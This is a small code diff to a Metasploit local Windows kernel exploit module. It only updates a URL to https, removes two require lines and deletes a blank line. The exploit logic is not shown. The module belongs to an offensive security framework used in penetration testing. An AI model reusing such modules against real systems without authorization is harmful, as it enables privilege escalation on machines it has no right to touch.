@@ -1,11 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'msf/core/exploit/local/windows_kernel'
-require 'rex'
 
 class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
@@ -157,5 +155,4 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::Unknown, 'Error while executing the payload')
     end
   end
-
 end
